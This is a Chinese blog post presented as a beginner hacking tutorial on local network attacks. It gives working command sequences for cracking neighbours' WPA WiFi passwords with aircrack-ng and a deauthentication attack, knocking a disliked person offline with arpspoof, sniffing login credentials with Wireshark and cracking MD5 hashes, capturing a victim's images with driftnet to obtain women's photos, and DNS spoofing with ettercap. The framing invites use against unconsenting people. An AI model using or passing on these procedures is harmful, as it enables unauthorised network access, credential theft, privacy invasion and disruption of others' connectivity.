特殊时期,大家一定要保重身体。增强自身免疫力,一切都会过去,一起加油!!!

黑客入门学习之局域网安全(破解wifi密码等)

黑客入门 zchao 897℃ 0评论

局域网安全,包括以下内容(其中用到的工具,可以百度,也可以给我留言)

1.局域网安全简介
2.利用kali破解wifi密码
3.让不顺眼的人断网
4.局域网密码嗅探
5.内网抓图获取妹子相册

 

局域网安全简介

1. 什么是局域网
同一个交换机(划分了vlan的同一AP不是局域网)、同一个hub或者同一个家用路由器。如果不在同一局域网,就得想办法,比如破解他的wifi密码。
2. 局域网主要有什么威胁
来自内网的攻击非常多,也很难解决:抓包嗅探、dns欺骗、泛洪攻击等。如果能拿到网关或者交换机的管理权限,那么攻击是很方便的。
3. 路由器配置
了解管理路由器账户密码、pppoe、ssid(bssid)、信道、mac、mac克隆。

TP-LINK步骤:
一:首先如果有个无线路由器,那么就先把电源接通,然后插上网线,进线插在wan口(一般是蓝色口),然后跟电脑连接的网线就随便插哪一个lan口啦,做好这些工作后,然后你会看到路由器后面有个地址跟帐号密码,连接好后在浏览器输入在路由器看到的地址,一般是192.168.1.1(当然如果你家是用电话线上网那就还要多准备一个调制调解器,俗称“猫”)
二:然后进入,输入相应的帐号跟密码,一般新买来的都是admin
三:确实后进入操作界面,你会在左边看到一个设置向导,进击进入(一般的都是自动弹出来的)
四:进入设置向导界面
五:点击下一步,进入上网方式设置,我们可以看到有三种上网方式的选择,如果你家是拨号的话那么就用PPPoE。动态IP一般电脑直接插上网络就可以用的,上层有DHCP服务器的。静态IP一般是专线什么的,也可能是小区带宽等,上层没有DHCP服务器的,或想要固定IP的。因为我拨号所以选择pppoe。
六:选择PPPOE拨号上网就要填上网帐号跟密码,这个应该大家都明白,开通宽带都会有帐号跟,填进去就OK啦
七:然后下一步后进入到的是无线设置,我们可以看到信道、模式、安全选项、SSID等等,一般SSID就是一个名字,你可以随便填,然后模式大多用11bgn.无线安全选项我们要选择wpa-psk/wpa2-psk,这样安全,免得轻意让人家破解而蹭网。
八:下一步就设置成功啦
九:点击完成,路由器会自动重启,这时候你耐心等待吧。成功后出现的界面。

4. 字典
kali自带字典解压:gzip -d /usr/share/wordlists/rockyou.txt.gz

 

利用kali破解wifi密码

1.支持监控模式的网卡
虚拟机是不支持驱动的,所以需要外接网卡(比如RT3070L)。装驱动得用U盘装kali,或者双系统,然后安装驱动。
将无线网卡链接到kali中
2. 操作步骤
①列出支持监控模式的网卡 airmon-ng
②开启网卡的监控模式 airmon-ng start wlan0 (成功后wlan0会变成wlan0mon)
③查看wifi网络 airodump-ng wlan0mon(查看附近出现的wifi,ctrl+c暂停搜索)
④抓取握手包 airodump-ng -c 12 –bssid 00:26:5A:F1:FF:2F -w ~/ wlan0mon(-c是CH,–bssid是BSSID,-w是保存,保存到根目录主文件夹)
⑤强制连接到wifi的设备重新连接路由器(方便监听抓取握手包)
新建端口:aireplay-ng -0 2 -a 00:26:5A:F1:FF:2F -c EC:0E:C4:16:4C:D5 wlan0mon(选择上面抓到的握手包,将连接的客户端断网)
⑥回到之前端口 按Ctrl+C结束抓包。结束无线网卡的监控模式: airmon-ng stop wlan0mon
⑦开始破解密码aircrack-ng -a2 -b 00:26:5A:F1:FF:2F -w /usr/share/wordlists/rockyou.txt ~/*.cap

 

让不顺眼的人断网

1. OSI网络模型底下三个

七层模型
物理层:
数据链路层:
网络层:
传输层:
会话层:
表示层:
应用层:

 

2. arp和rarp
arp ip -> mac
rarp mac -> ip
3. 断网操作

环境:win7和kali

扫描本网段联网主机 fping –asg 192.168.254.0/24
执行攻击arpspoof -i eth0 -t 192.168.254.140(受害者) 192.168.254.2(网关地址)

 

局域网密码嗅探

1.同一局域网嗅探原理
2.使用的工具
wireshark:自己去官网下载,自动安装插件
3.wireshark过滤规则
百度wireshark过滤规则
一:过滤源ip、目的ip。在wireshark的过滤规则框Filter中输入过滤条件。如查找目的地址为192.168.101.8的包,ip.dst==192.168.101.8;查找源地址为ip.src==1.1.1.1;
二:端口过滤。如过滤80端口,在Filter中输入,tcp.port==80,这条规则是把源端口和目的端口为80的都过滤出来。使用tcp.dstport==80只过滤目的端口为80的,tcp.srcport==80只过滤源端口为80的包;
三:协议过滤比较简单,直接在Filter框中直接输入协议名即可,如过滤HTTP的协议;
四:http模式过滤。如过滤get包,http.request.method==”GET”,过滤post包,http.request.method==”POST”;
五:连接符and的使用。过滤两种条件时,使用and连接,如过滤ip为192.168.101.8并且为http协议的,ip.src==192.168.101.8 and http。

4.抓取到的信息筛选
中文ID需要进行URL转码,加密密码需要解密
步骤:
打开wireshark,发现网卡,双击进入,开始嗅探,局域网抓包
如果同一局域网的电脑登陆某个系统,有用户名密码,可以被监听到
抓包结束,可以选择固定的IP进行查看:ip.addr=115.123.196.234(你想监听的那个人的IP)
找协议为HTTP,含有action=login的页面,双击进入,在URL Encoded中可以查看用户名密码,
如果用户名是乱码,可以进行转码,如果密码是乱码,一般为md5加密,可以找md5网站破解。

 

内网抓图获取妹子相册

kali
1.原理
类似于抓包,但是这个只是劫持一个人的
2.端口转发
临时开启ip转发命令echo 1 > /proc/sys/net/ipv4/ip_forward
开启ARP欺骗 arpspoof -i eth0 -t 192.168.254.140 192.168.254.2
3.嗅探
利用工具 driftnet(获取本机图片)
driftnet -i eth0

DNS欺骗

1.什么是dns,什么作用
域名和ip之间的关系的对应,就是由dns负责。(hosts)
2.dns欺骗有什么要求
要求对方dns是自动获取(关于dns故障,可以上q不能上网站)
dns(8.8.8.8,,114.114.114.114)
3.欺骗过程
ettercap的DNS文件进行编辑,在kali linux2.0下的文件路径为/etc/ettercap/etter.dns
标识和IP地址 * 代表所有域名 后边就是你要欺骗为的IP地址(例如:* A ip(www.zchaohome.com)或者 * PTR ip(www.zchaohome.com) )
输入命令ettercap -G来进入ettercap的图形界面
选择网卡Unfied sniffing配置自己的网卡,我的是eth0
扫描在线的主机,来到hosts选项下的 scan for hosts并列出Hosts list
网关进行添加到 Add to target 1 受害者添加到 Add to target 2
继续点击mitm>arp poisoning选中第一个选项并确定
配置插件plugins>mangge the plugins 选择 双击dns_spoof
最后点击strat>start sniffing开始DNS欺骗

目的:让受害者输入的网址指向你自己设置的网址

 

本文内容由技术讲师董文磊提供支持

更多精彩内容及细节学习:请到网易云课堂董文磊讲师专题学习

网络工程师董文磊

http://study.163.com/provider/1021000286/index.htm

 

 

Follow me

zchao

站长 at GR
我在故我思,我思故我在
Follow me

转载请注明:zchao博客之家 » 黑客入门学习之局域网安全(破解wifi密码等)

喜欢 (5)or分享 (0)

说点什么

Please Login to comment
  Subscribe  
提醒